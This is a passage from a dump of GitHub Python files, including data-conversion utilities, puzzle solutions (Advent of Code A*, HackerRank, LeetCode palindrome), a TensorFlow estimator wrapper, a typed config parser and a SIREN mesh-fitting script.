dateIn.day)\r\n elif isinstance(dateIn, datetime.datetime):\r\n dateOut = '{0:04}-{1}-{2}'.format(dateIn.year, dateIn.month, dateIn.day)\r\n else:\r\n dateOut = validateDate(dateIn)\r\n return dateOut\r\n\r\ndef absFloats(float1, float2):\r\n diff = 0.0\r\n if float1 is None and float2 is None:\r\n diff = 0.0\r\n elif float1 is None:\r\n if float2==NONE_VALUE:\r\n diff = 0.0\r\n else:\r\n diff = abs(float2)\r\n elif float2 is None:\r\n if float1==NONE_VALUE:\r\n diff = 0.0\r\n else:\r\n diff = abs(float1)\r\n else:\r\n if float1==NONE_VALUE and float2==NONE_VALUE:\r\n diff = 0.0\r\n elif float1==NONE_VALUE:\r\n diff = abs(float2)\r\n elif float2==NONE_VALUE:\r\n diff = abs(float1)\r\n else:\r\n diff = abs(float1 - float2)\r\n \r\n return diff\r\n \r\n \r\ndef validateDate(dateIn):\r\n try:\r\n dt = parse(dateIn)\r\n dateOut = '{0:04}-{1}-{2}'.format(dt.year, dt.month, dt.day)\r\n except ValueError:\r\n msg = 'Not right date format: ', dateIn\r\n dateOut = None\r\n \r\n return dateOut\r\n \r\ndef toBooleanValue(formdata, fieldname):\r\n value_new = False\r\n if fieldname in formdata:\r\n value = formdata[fieldname]\r\n if value is not None:\r\n value = str(value)\r\n value = value.upper().strip()\r\n if value==\"1\" or value==\"Y\" or value==\"YES\" or value==\"TRUE\" or value==\"T\":\r\n value_new = True\r\n \r\n formdata[fieldname] = value_new\r\n return formdata\r\n\r\ndef getDefaultDate():\r\n datenow = datetime.datetime.now().strftime(\"%Y-%m-%d\")\r\n return 
\r\ndef getDefaultDateTime():\r\n datenow = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n return datenow\r\n\r\ndef cleanString(itemIn):\r\n return cleanStringDB(itemIn)\r\n \r\ndef convertSQLString(value):\r\n if isinstance(value, datetime.date):\r\n strValue = \"'\" + str(value) + \"'\"\r\n elif is_numeric(value):\r\n strValue = str(value)\r\n else:\r\n if value is None:\r\n strValue = \"''\"\r\n elif \"'\" in value:\r\n strValue = value.replace(\"'\", \"''\")\r\n strValue = \"'\" + strValue + \"'\"\r\n elif '\"' in value:\r\n strValue = value.replace('\"', \"''\")\r\n strValue = \"'\" + strValue + \"'\"\r\n else:\r\n strValue = \"'\" + value + \"'\"\r\n \r\n return strValue\r\n\r\ndef handle_uploaded_file(infile, outfilename):\r\n dest = open(outfilename, 'wb')\r\n for chunk in infile.chunks():\r\n dest.write(chunk)\r\n dest.close()\r\n \r\ndef correctFileName(infilename):\r\n if infilename is None:\r\n return None\r\n \r\n outfilename = infilename.strip()\r\n if ' ' in outfilename:\r\n outfilename = outfilename.replace(' ', '-')\r\n \r\n return outfilename\r\n \r\ndef convertDicToOptions(dicIn):\r\n options = []\r\n \r\n si = {\"selected\": 'true', \"id\": 0, \"title\": \"\"}\r\n options.append(si)\r\n for k,v in dicIn.items():\r\n si = {}\r\n si[\"id\"] = k\r\n si[\"title\"] = v\r\n options.append(si)\r\n return options\r\n \r\n \r\ndef sizeof_fmt(num):\r\n if num is None:\r\n return ''\r\n \r\n num = toInt(num)\r\n unit_list = zip(['bytes', 'kB', 'MB', 'GB', 'TB', 'PB'], [0, 0, 1, 2, 2, 2])\r\n if num > 1:\r\n exponent = min(int(log(num, 1024)), len(unit_list) - 1)\r\n quotient = float(num) / 1024**exponent\r\n unit, num_decimals = unit_list[exponent]\r\n format_string = '{:.%sf} {}' % (num_decimals)\r\n return format_string.format(quotient, unit)\r\n if num == 0:\r\n return '0 bytes'\r\n if num == 1:\r\n return '1 byte'\r\n \r\n \r\ndef getFileChecksum(fullfilename, checksumFormat='MD5'):\r\n cf = checksumFormat.upper()\r\n if cf=='MD5':\r\n fi = open(fullfilename,'rb').read()\r\n md5 = hashlib.md5(fi).hexdigest()\r\n checksum = md5\r\n elif cf=='SHA1':\r\n openedFile = open(fullfilename,'rb')\r\n readFile = openedFile.read()\r\n sha1Hash = hashlib.sha1(readFile)\r\n sha1Hashed = sha1Hash.hexdigest()\r\n checksum = sha1Hashed\r\n else:\r\n checksum = 'NA'\r\n return checksum\r\n \r\n \r\ndef verifyFileChecksum(fullfilename):\r\n fi = open(fullfilename,'rb').read()\r\n md5 = hashlib.md5(fi).hexdigest()\r\n \r\n sha1Hash = hashlib.sha1(fi)\r\n sha1 = sha1Hash.hexdigest()\r\n \r\n filesize = os.path.getsize(fullfilename)\r\n return md5, sha1, filesize\r\n \r\n \r\n \r\ndef verifyValueType(valuetype, value):\r\n if valuetype is None:\r\n return False\r\n \r\n valuetypeStr = toString(valuetype)\r\n valuetypeStr = valuetypeStr.strip().upper()\r\n \r\n if valuetypeStr=='DATE':\r\n dateValue = toDateClass(value)\r\n if dateValue is None:\r\n return False\r\n else:\r\n return True\r\n elif valuetypeStr=='TEXT':\r\n valueStr = toString(value)\r\n return True\r\n elif valuetypeStr=='NUMBER' or valuetypeStr=='FLOAT':\r\n return is_numeric(value)\r\n \r\n return True\r\n \r\n \r\ndef main():\r\n parser = argparse.ArgumentParser(description=\"Submit a data file through API call to the Seek system\",\r\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\n parser.add_argument('inputFilename', help='Input file')\r\n args = parser.parse_args()\r\n inputfile = 
args.inputFilename\r\n getFileChecksum(inputfile, 'MD5')\r\n getFileChecksum(inputfile, 'SHA1')\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"BMCBCC/NExtSEEK","sub_path":"dmac/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":23027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18603995540","text":"\"\"\" Advent of code Year 2022 Day 12 solution\nAuthor = Averbea\nDate = December 2022\n\"\"\"\n\n\nimport math\nimport os\nfrom time import time\n\n\ndef measure_timing(func):\n \"\"\"measures the time needed for executing the given function\"\"\"\n time_start = time()\n result = func()\n time_end = time()\n return time_end-time_start, result\n\n\nclass Node:\n \"\"\"class representing a Node\"\"\"\n\n def __init__(self, pos: tuple[int, int], predecessor=None) -> None:\n self.pos = pos\n self.predecessor = predecessor\n\n self.dist_to_start = 0\n\n def __eq__(self, other) -> bool:\n return self.pos == other.pos\n\n def __repr__(self) -> str:\n return str(self.pos)\n\n\ndef parse_input():\n \"\"\"parses the input file and returns the result\"\"\"\n with open(os.path.dirname(__file__) + \"/input.txt\", 'r', encoding=\"UTF-8\") as input_file:\n inputs = input_file.read().splitlines()\n grid = list(map(lambda el: [*el], inputs))\n return grid\n\n\ndef get_starting_s_and_end(grid):\n \"\"\"get S as starting positions and end position\"\"\"\n start = end = None\n for y_pos, line in enumerate(grid):\n for x_pos, col in enumerate(line):\n if col == \"S\":\n start = (y_pos, x_pos)\n if col == \"E\":\n end = (y_pos, x_pos)\n assert start is not None\n assert end is not None\n return start, end\n\n\ndef get_starting_positions_and_end(grid):\n \"\"\"get S and all occurences of a as starting position and end position\"\"\"\n starts = []\n end = None\n for y_pos, line in enumerate(grid):\n for x_pos, col in enumerate(line):\n if col == \"S\" or col == \"a\":\n starts.append((y_pos, x_pos))\n if col == \"E\":\n end = (y_pos, x_pos)\n assert starts is not None\n assert end is not None\n return starts, end\n\n\ndef lookup(char):\n \"\"\"get comparable values for chars\"\"\"\n\n if char == \"E\":\n char = \"z\"\n if char == \"S\":\n char = \"a\"\n\n return ord(char)\n\n\ndef get_neighbors(data: list[list[str]], cur_pos: tuple[int, int]):\n \"\"\"get neighbor positions for cur_pos in data\"\"\"\n\n neighbors = []\n\n y_pos, x_pos = cur_pos\n cur_data = data[y_pos][x_pos]\n cur_val = lookup(cur_data)\n height = len(data)\n width = len(data[0])\n\n directions = [(0, -1), (-1, 0), (0, 1), (1, 0)]\n\n for dir_y, dir_x in directions:\n if 0 <= y_pos + dir_y < height and 0 <= x_pos + dir_x < width:\n neighbor_data = data[y_pos + dir_y][x_pos + dir_x]\n neighbor_val = lookup(neighbor_data)\n if neighbor_val <= cur_val + 1:\n neighbors.append((y_pos + dir_y, x_pos+dir_x))\n\n return neighbors\n\n\ndef heuristic(position: tuple[int, int], target: tuple[int, int]):\n \"\"\"heuristic function\"\"\"\n return abs(target[0] - position[0]) + abs(target[1] - position[1])\n\n\ndef total_cost(node: Node, target: tuple[int, int]):\n \"\"\"calculate the total cost to end node\"\"\"\n return node.dist_to_start + heuristic(node.pos, target)\n\n\ndef a_star(data: list[list[str]], start_pos: tuple[int, int], end_pos: tuple[int, int]):\n \"\"\"A star algorithm\"\"\"\n start_node = Node(start_pos)\n end_node = Node(end_pos)\n # open list contains 
start node\n open_list: list[Node] = [start_node]\n # closed list is initially empty\n closed_list: list[Node] = []\n\n # until there are no nodes to explore\n while len(open_list) > 0:\n # get node with minimum total cost from open_list\n cur_node = open_list[0]\n cur_index = 0\n for index, node in enumerate(open_list):\n if total_cost(node, end_pos) < total_cost(cur_node, end_pos):\n cur_node = node\n cur_index = index\n open_list.pop(cur_index)\n\n if cur_node.pos == end_node.pos:\n # Backtrack to get path\n path = [cur_node.pos]\n while cur_node is not None:\n path.append(cur_node.pos)\n cur_node = cur_node.predecessor\n\n return path[1:-1][::-1]\n\n # add this node to closed list\n closed_list.append(cur_node)\n\n # Expand node\n neighbor_positions = get_neighbors(data, cur_node.pos)\n for neighbor_pos in neighbor_positions:\n neighbor_node = Node(neighbor_pos, cur_node)\n\n # if this neighbor is closed it there is nothing to do\n if neighbor_node in closed_list:\n continue\n\n # calculate new distance\n new_distance = cur_node.dist_to_start + 1\n\n # if new node is in open list and has a smaller distance there is nothing to do\n\n if neighbor_node in open_list:\n index = open_list.index(neighbor_node)\n if new_distance >= open_list[index].dist_to_start:\n continue\n\n # set predecessor and current node\n neighbor_node.predecessor = cur_node\n neighbor_node.dist_to_start = new_distance\n\n # add node to open list\n open_list.append(neighbor_node)\n return []\n\n\ndef part_one():\n \"\"\"Solution for Part 1\"\"\"\n data = parse_input()\n\n start_pos, end_pos = get_starting_s_and_end(data)\n path = a_star(data, start_pos, end_pos)\n return len(path)\n\n\ndef part_two():\n \"\"\"Solution for Part 2\"\"\"\n data = parse_input()\n\n starting_positions, end_pos = get_starting_positions_and_end(data)\n paths = []\n\n for i, start_pos in enumerate(starting_positions):\n print(i, \"/\", len(starting_positions))\n path = a_star(data, start_pos, end_pos)\n paths.append(path)\n\n minimum = math.inf\n print(\"done\")\n for path in paths:\n if len(path) != 0:\n minimum = min(len(path), minimum)\n\n return minimum\n\n\ndef main():\n \"\"\"main method\"\"\"\n time_needed, result = measure_timing(part_one)\n\n print(\"Part One : \" + str(result))\n print(\"time elapsed: \" + str(time_needed))\n\n time_needed, result = measure_timing(part_two)\n print(\"\\nPart Two : \" + str(result))\n print(\"time elapsed: \" + str(time_needed))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Averbea/AdventOfCode","sub_path":"2022/12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4917482715","text":"from collections import deque\n\nfor _ in range(int(input())):\n t, side = input(), list(map(int, input().split()))\n num = max(side[0], side[-1])\n while True:\n try:\n if (side[0] >= side[-1]) and (side[0] <= num):\n num = side.pop(0)\n elif (side[0] < side[-1]) and (side[-1] <= num):\n num = side.pop(-1)\n else:\n print('No')\n break\n except IndexError:\n break\n\n if side == []: print('Yes')\n \n","repo_name":"PROxZIMA/Competitive-Coding","sub_path":"Hackerrank/Python/piling-up.py","file_name":"piling-up.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"18679269811","text":"import os\nimport sys\nimport shutil\nimport numpy as np\n\nimport tensorflow as tf\nfrom 
tensorflow.python.summary import summary\n\nfrom learning.neuralnet.NeuralNetEstimator import NeuralNetEstimator\nfrom learning.neuralnet.NeuralNetDatasetHandler import NeuralNetDatasetHandler\nfrom learning.neuralnet.NeuralNetDatasetMaker import NeuralNetDatasetMaker\nfrom utils.Dataset import Dataset\n\nfrom official.utils.logs import hooks_helper\nfrom official.utils.logs import logger\nfrom official.utils.misc import model_helpers\n\n\nclass NeuralNetModel():\n\n def __init__(self, mode, dict_dataset_options, feature_columns, flags):\n self.feature_columns = feature_columns;\n self.dataset_options_train = dict_dataset_options['train'];\n self.dataset_options_eval = dict_dataset_options['eval'];\n self.dataset_options_test = dict_dataset_options['test'];\n self.mode = mode;\n self.flags = flags;\n\n if not os.path.exists(self.flags.model_dir):\n os.makedirs(self.flags.model_dir)\n\n if self.mode == 'train':\n if self.dataset_options_eval is not None:\n self.dataset_handler_train = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'train', self.dataset_options_train);\n self.dataset_handler_eval = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_eval, feature_columns, 'eval');\n else:\n self.dataset_handler_train = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'train');\n self.dataset_handler_eval = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'eval');\n elif self.mode == 'test':\n self.dataset_handler_train = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'train');\n self.dataset_handler_eval = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'eval');\n self.dataset_handler_test = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_test, feature_columns, 'test');\n\n self.model = None;\n self.flags.hidden_units = [int(u) for u in self.flags.hidden_units];\n return;\n\n def _setModelDir(self):\n modeldir_base = self.flags.model_dir;\n dropoutrate = self.flags.dropout;\n learningrate = self.flags.learningrate;\n batchnorm = self.flags.batchnorm;\n batchsize = self.flags.batch_size;\n dataset_filename_options = self.dataset_options_train.getFilenameOptions(filteroptions=False);\n suffix_modeldir = '';\n if self.flags.continue_training:\n suffix_modeldir = 'warmstart_';\n suffix_modeldir = suffix_modeldir + dataset_filename_options + '_' + str(self.flags.hidden_units[0]);\n\n for k in range(1, len(self.flags.hidden_units)):\n suffix_modeldir = suffix_modeldir + '_' + str(self.flags.hidden_units[k]);\n\n suffix_modeldir = suffix_modeldir + '_dropout_' + str(dropoutrate);\n suffix_modeldir = suffix_modeldir + '_learningrate_' + str(learningrate);\n suffix_modeldir = suffix_modeldir + '_batchnorm_' + str(batchnorm);\n suffix_modeldir = suffix_modeldir + '_batchsize_' + str(batchsize);\n\n # Add filtering option if specified\n if self.dataset_handler_train.dataset.options.options_filtering is not None:\n suffix_modeldir += '_filtering_' + str(self.dataset_handler_train.dataset.options.options_filtering)\n\n model_dir = os.path.join(modeldir_base, suffix_modeldir);\n self.flags.model_dir = model_dir;\n if self.mode == 'train':\n if self.dataset_options_eval is not None:\n self.dataset_handler_train.update_model_dir(self.flags.model_dir);\n self.dataset_handler_eval.update_model_dir(self.flags.model_dir);\n else:\n 
self.dataset_handler_train.update_model_dir(self.flags.model_dir);\n self.dataset_handler_eval.update_model_dir(self.flags.model_dir);\n elif self.mode == 'test':\n self.dataset_handler_train.update_model_dir(self.flags.model_dir);\n self.dataset_handler_eval.update_model_dir(self.flags.model_dir);\n self.dataset_handler_test.update_model_dir(self.flags.model_dir);\n\n\n def _input_fn_train(self):\n dataset = self.dataset_handler_train.readDatasetTF();\n dataset = dataset.repeat(self.flags.epochs_between_evals);\n dataset = dataset.batch(self.flags.batch_size, drop_remainder=self.flags.enable_dp);\n return dataset;\n\n def _input_fn_eval(self):\n dataset = self.dataset_handler_eval.readDatasetTF();\n dataset = dataset.repeat(1);\n dataset = dataset.batch(self.flags.batch_size);\n return dataset;\n\n def _input_fn_test(self):\n dataset = self.dataset_handler_test.readDatasetTF();\n dataset = dataset.repeat(1);\n dataset = dataset.batch(self.flags.batch_size);\n return dataset;\n\n def export_model(self):\n \"\"\"Export to SavedModel format.\n Args:\n model: Estimator object\n export_dir: directory to export the model.\n \"\"\"\n estimator = self.model.getEstimator();\n deep_columns = self.feature_columns.buildModelColumns()\n feature_spec = tf.feature_column.make_parse_example_spec(deep_columns)\n example_input_fn = (tf.estimator.export.build_parsing_serving_input_receiver_fn(feature_spec))\n r = estimator.export_savedmodel(self.flags.export_dir, example_input_fn)\n\n def _getModelEstimator(self):\n self._setModelDir();\n if self.model is None:\n self.flags.export_dir = os.path.join(self.flags.model_dir, 'export_model');\n if self.mode == 'train':\n # Clean up the model directory if present\n # if not self.flags.model_dir == self.flags.pretrained_model_dir:\n # shutil.rmtree(self.flags.model_dir, ignore_errors=True)\n self.model = NeuralNetEstimator(self.feature_columns, self.flags,\n self.dataset_handler_train.dataset.getNumSamplesBalancedSubset());\n if self.mode == 'test':\n self.model = NeuralNetEstimator(self.feature_columns, self.flags,\n self.dataset_handler_test.dataset.getNumSamplesBalancedSubset());\n\n def createDatasets(self):\n if self.mode == 'train':\n if self.dataset_options_eval is not None:\n dataset_maker_train = NeuralNetDatasetMaker('train', self.flags.model_dir, self.dataset_options_train);\n dataset_maker_eval = NeuralNetDatasetMaker('eval', self.flags.model_dir, self.dataset_options_eval);\n dataset_maker_train.createDatasets();\n dataset_maker_eval.createDatasets();\n else:\n # dataset_maker = NeuralNetDatasetMaker('traineval', self.flags.model_dir, self.dataset_options_train, balanced_datasets=False);\n dataset_maker = NeuralNetDatasetMaker('traineval', self.flags.model_dir, self.dataset_options_train);\n dataset_maker.createDatasets();\n elif self.mode == 'test':\n dataset_maker = NeuralNetDatasetMaker('test', self.flags.model_dir, self.dataset_options_test);\n dataset_maker.createDatasets();\n\n def removeDatasets(self):\n if self.mode == 'test':\n dataset_maker = NeuralNetDatasetMaker('test', self.flags.model_dir, self.dataset_options_test);\n dataset_maker.removeDatasets();\n else:\n print('removing datasets is only possible in test mode...exit')\n sys.exit()\n\n def train(self):\n\n self.createDatasets();\n\n if self.model is None:\n self._getModelEstimator();\n\n\n estimator = self.model.getEstimator();\n\n run_params = {\n 'batch_size': self.flags.batch_size,\n 'train_epochs': self.flags.train_epochs,\n 'model_type': 'deep',\n }\n\n benchmark_logger = 
logger.config_benchmark_logger(self.flags)\n benchmark_logger.log_run_info('deep', 'Readmission Patient', run_params)\n\n # Train and evaluate the model every `flags.epochs_between_evals` epochs.\n for n in range(self.flags.train_epochs // self.flags.epochs_between_evals):\n # Break from loop if privacy budget is exceedeed and differential privacy is enabled\n if self.flags.enable_dp and self.model.is_privacy_budget_exceeded():\n break\n\n print('n: ' + str(n))\n estimator.train(input_fn=self._input_fn_train)\n results = estimator.evaluate(input_fn=self._input_fn_eval)\n # Display evaluation metrics\n tf.logging.info('Results at epoch %d / %d', (n + 1) * self.flags.epochs_between_evals,\n self.flags.train_epochs)\n tf.logging.info('-' * 60)\n\n for key in sorted(results):\n tf.logging.info('%s: %s' % (key, results[key]))\n\n benchmark_logger.log_evaluation_result(results)\n\n if model_helpers.past_stop_threshold(self.flags.stop_threshold, results['accuracy']):\n break\n\n # Export the model\n print('export the model?')\n if n % 10 == 0 and self.flags.export_dir is not None:\n self.export_model()\n\n def predict(self):\n if self.model is None:\n self._getModelEstimator();\n\n self.createDatasets();\n estimator = self.model.getEstimator();\n results = estimator.predict(input_fn=self._input_fn_test)\n # self.removeDatasets();\n return results;\n\n def getModelDir(self):\n return self.flags.model_dir;\n\n def getFlags(self):\n return self.flags;\n\n def getFilenameDatasetBalanced(self):\n if self.mode == 'train':\n return self.dataset_handler_train._getFilenameDatasetBalanced();\n elif self.mode == 'eval':\n return self.dataset_handler_eval._getFilenameDatasetBalanced();\n elif self.mode == 'test':\n return self.dataset_handler_test._getFilenameDatasetBalanced();\n else:\n print('unknown mode...exit')\n sys.exit();\n\n def getWeightsEmbeddingLayer(self, name_embedding):\n if name_embedding == 'main_diag':\n name_embedding_variable = self.feature_columns.getEmbeddingLayerNames()[0];\n elif name_embedding == 'diag':\n name_embedding_variable = self.feature_columns.getEmbeddingLayerNames()[1];\n else:\n print('embedding is unknown...exit')\n sys.exit();\n estimator = self.model.getEstimator();\n values = estimator.get_variable_value(name_embedding_variable)\n return values;\n","repo_name":"MedicalDataScience/PATREC","sub_path":"learning/neuralnet/NeuralNetModel.py","file_name":"NeuralNetModel.py","file_ext":"py","file_size_in_byte":10945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"21286164996","text":"\"\"\"\nProblem statement: https://leetcode.com/problems/longest-palindromic-substring/\nSolution explained: https://www.youtube.com/watch?v=y2BD4MJqV20&ab_channel=NickWhite\nPassed all tests--> Yess!!!\nComplexity -- Time-> 0(n^2)\n\t\t\t\tSpace --> O(1)\n\"\"\"\n\ndef get_longest_palindrome_recursive(s):\n\tn = len(s)\n\tif n == 0:\n\t\treturn \"\"\n\tif n == 1:\n\t\treturn s\n\n\tstart = 0\n\tend = 0\n\tfor ii in range(n):\n\t\tlen_one = expand_from_middle(s, ii, ii)\n\t\tlen_two = expand_from_middle(s, ii, ii+1)\n\t\tlength = max(len_one, len_two)\n\t\tif length > (end - start):\n\t\t\tstart = ii - length//2\n\t\t\tend = ii + length//2\n\treturn s[start:end+1]\n\n\ndef expand_from_middle(s, left, right):\n\tif len(s) == 0 or left > right: return \"\"\n\tn = len(s)\n\n\twhile left >= 0 and right < n and s[left] == s[right]:\n\t\tleft -= 1\n\t\tright += 1\n\treturn 
right-left-1\n\n\nprint(get_longest_palindrome_recursive(\"cbbd\"))\n","repo_name":"ssbagalkar/PythonDataStructuresPractice","sub_path":"DP-aditya-verma-playlist/LCS/11_Leetcode-Longest-Palindrome-substring.py","file_name":"11_Leetcode-Longest-Palindrome-substring.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10512760676","text":"###############################################################################\n#\n# configglue -- glue for your apps' configuration\n#\n# A library for simple, DRY configuration of applications\n#\n# (C) 2009--2013 by Canonical Ltd.\n# by John R. Lenton \n# and Ricardo Kirkner \n#\n# Released under the BSD License (see the file LICENSE)\n#\n# For bug reports, support, and new releases: http://launchpad.net/configglue\n#\n###############################################################################\n\n\"\"\" TypedConfigParser lives here \"\"\"\n\nimport os\n\nfrom configglue._compat import text_type\nfrom . import parsers\nfrom .attributed import AttributedConfigParser\n\n\nclass TypedConfigParser(AttributedConfigParser):\n \"\"\"Building on AttributedConfigParser, handle the idea of having a\n configuration file that knows what type its options are.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(TypedConfigParser, self).__init__(*args, **kwargs)\n self.parsers = {'bool': parsers.bool_parser,\n 'complex': complex,\n 'float': float,\n 'int': int,\n 'lines': parsers.lines,\n 'unicode': text_type,\n 'getenv': os.getenv,\n None: lambda x: x}\n\n def add_parser(self, name, parser, clobber=False):\n \"\"\"Add a custom parser\n\n @param name: the name with which you can ask for this parser\n in the configuration file\n @param parser: the parser itself\n @param clobber: whether to overwite an existing parser\n \"\"\"\n if name not in self.parsers or clobber:\n self.parsers[name] = parser\n else:\n raise ValueError('A parser by that name already exists')\n\n def add_parsers(self, *args):\n \"\"\"Add multiple custom parsers\n\n @param args: any number of (name, parser, [clobber]) tuples\n \"\"\"\n for arg in args:\n self.add_parser(*arg)\n\n def parse(self, section, option):\n \"\"\"Parse a single option in a single section.\n\n This actually consumes the 'parser', 'parser_args' and 'default'\n attributes.\n\n @param section: the section within which to look for the option\n @param option: the 'base' option to parse\n \"\"\"\n super(TypedConfigParser, self).parse(section, option)\n\n value = self.get(section, option)\n\n if 'default.parser' in value.attrs:\n parser = self.parsers[value.attrs.pop('default.parser')]\n value.attrs['default'] = parser(value.attrs['default'])\n\n if value.is_empty:\n if 'default' in value.attrs:\n value.value = value.attrs['default']\n else:\n value.value = None\n\n if 'parser' in value.attrs:\n args = value.attrs.pop('parser.args', ())\n if args != ():\n args_parser = value.attrs.pop('parser.args.parser', 'lines')\n args = self.parsers[args_parser](args)\n # leave the parser hanging around for if you need it later\n value.parser = self.parsers[value.attrs.pop('parser')]\n value.value = value.parser(value.value, *args)\n else:\n value.parser = self.parsers[None]\n\n # tadaa!\n self.set(section, option, 
value)\n","repo_name":"nessita/configglue","sub_path":"configglue/inischema/typed.py","file_name":"typed.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"14390331040","text":"import sys\n\nsys.path.append(\"..\")\n\nfrom math import ceil\nfrom pathlib import Path\nfrom typing import Callable, List\n\nimport h5py\nimport torch\nimport torch.nn.functional as F\nfrom hesiod import hcfg, hmain\nfrom pycarus.datasets.manifold40 import Manifold40\nfrom pycarus.geometry.mesh import compute_sdf_from_mesh, get_o3d_mesh_from_tensors\nfrom pycarus.geometry.pcd import random_point_sampling, shuffle_pcd\nfrom pycarus.learning.models.siren import SIREN\nfrom pycarus.transforms.pcd import NormalizePcdIntoUnitSphere, RandomScalePcd\nfrom pycarus.utils import progress_bar\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom utils import get_mlps_batched_params, mlp_batched_forward\n\n\nclass InrsDatasetCreator:\n def __init__(self) -> None:\n self.dset_name = hcfg(\"dset_name\", str)\n self.mesh_root = Path(hcfg(\"mesh_root\", str))\n self.splits = hcfg(\"splits\", List[str])\n\n self.num_queries_on_surface = hcfg(\"num_queries_on_surface\", int)\n self.stds = hcfg(\"stds\", List[float])\n self.num_points_per_std = hcfg(\"num_points_per_std\", List[int])\n\n self.num_required_train_shapes = hcfg(\"num_required_train_shapes\", int)\n dset = self.get_dataset(\"train\")\n num_train_shapes = len(dset) # type: ignore\n self.num_augmentations = ceil(self.num_required_train_shapes / num_train_shapes) - 1\n\n self.num_points_fitting = hcfg(\"num_points_fitting\", int)\n self.num_parallel_mlps = hcfg(\"num_parallel_mlps\", int)\n self.hdim = hcfg(\"mlp.hidden_dim\", int)\n self.num_hidden_layers = hcfg(\"mlp.num_hidden_layers\", int)\n self.mlp_init_path = Path(hcfg(\"mlp.init_path\", str))\n\n self.num_steps = hcfg(\"num_steps\", int)\n self.lr = hcfg(\"lr\", float)\n\n self.out_root = Path(hcfg(\"out_root\", str))\n self.out_root.mkdir(parents=True)\n\n def build_mlp(self) -> SIREN:\n mlp = SIREN(\n input_dim=3,\n hidden_dim=self.hdim,\n num_hidden_layers=self.num_hidden_layers,\n out_dim=1,\n )\n\n mlp.load_state_dict(torch.load(self.mlp_init_path))\n\n return mlp\n\n def get_dataset(self, split: str, transforms: List[Callable] = []) -> Dataset:\n if self.dset_name == \"manifold40\":\n dset = Manifold40(self.mesh_root, split, vertices_transforms=transforms, only_version=0)\n else:\n raise ValueError(\"Unknown dataset.\")\n return dset\n\n def create_dataset(self) -> None:\n for split in self.splits:\n global_idx = 0\n\n augs = [False]\n if \"train\" in split:\n augs += [True] * self.num_augmentations\n\n for num_aug, aug in enumerate(augs):\n if aug:\n transforms = [\n RandomScalePcd(2 / 3, 3 / 2),\n NormalizePcdIntoUnitSphere(),\n ]\n else:\n transforms = [NormalizePcdIntoUnitSphere()]\n\n dset = self.get_dataset(split, transforms)\n\n loader = DataLoader(dset, self.num_parallel_mlps, num_workers=0)\n\n desc = f\"Fitting {split} set (aug {num_aug + 1}/{len(augs)})\"\n for batch in progress_bar(loader, desc, num_cols=80):\n vertices, triangles, class_ids, num_vertices, num_triangles = batch\n bs = len(vertices)\n\n coords = []\n labels = []\n\n for idx in range(bs):\n num_v = num_vertices[idx]\n v = vertices[idx][:num_v]\n num_t = num_triangles[idx]\n t = triangles[idx][:num_t]\n mesh_o3d = get_o3d_mesh_from_tensors(v, t)\n\n mesh_coords, mesh_labels = 
compute_sdf_from_mesh(\n mesh_o3d,\n num_queries_on_surface=self.num_queries_on_surface,\n queries_stds=self.stds,\n num_queries_per_std=self.num_points_per_std,\n coords_range=(-1, 1),\n )\n coords.append(mesh_coords)\n labels.append(mesh_labels)\n\n coords = torch.stack(coords, dim=0)\n labels = torch.stack(labels, dim=0)\n\n coords_and_labels = torch.cat((coords, labels.unsqueeze(-1)), dim=-1).cuda()\n coords_and_labels = shuffle_pcd(coords_and_labels)\n\n mlps = [self.build_mlp().cuda() for _ in range(bs)]\n batched_params = get_mlps_batched_params(mlps)\n\n optimizer = Adam(batched_params, lr=self.lr)\n\n for _ in progress_bar(range(self.num_steps)):\n selected_c_and_l = random_point_sampling(\n coords_and_labels,\n self.num_points_fitting,\n )\n\n selected_coords = selected_c_and_l[:, :, :3]\n selected_labels = selected_c_and_l[:, :, 3]\n\n pred = mlp_batched_forward(batched_params, selected_coords)\n\n selected_labels = (selected_labels + 0.1) / 0.2\n loss = F.binary_cross_entropy_with_logits(pred, selected_labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n for idx in range(bs):\n v = vertices[idx]\n num_v = num_vertices[idx]\n t = triangles[idx]\n num_t = num_triangles[idx]\n\n class_id = class_ids[idx]\n\n crd = coords[idx]\n lbl = labels[idx]\n\n flattened_params = [p[idx].view(-1) for p in batched_params]\n flattened_params = torch.cat(flattened_params, dim=0)\n\n h5_path = self.out_root / split / f\"{global_idx}.h5\"\n h5_path.parent.mkdir(parents=True, exist_ok=True)\n\n with h5py.File(h5_path, \"w\") as f:\n f.create_dataset(\"vertices\", data=v.detach().cpu().numpy())\n f.create_dataset(\"num_vertices\", data=num_v.detach().cpu().numpy())\n f.create_dataset(\"triangles\", data=t.detach().cpu().numpy())\n f.create_dataset(\"num_triangles\", data=num_t.detach().cpu().numpy())\n 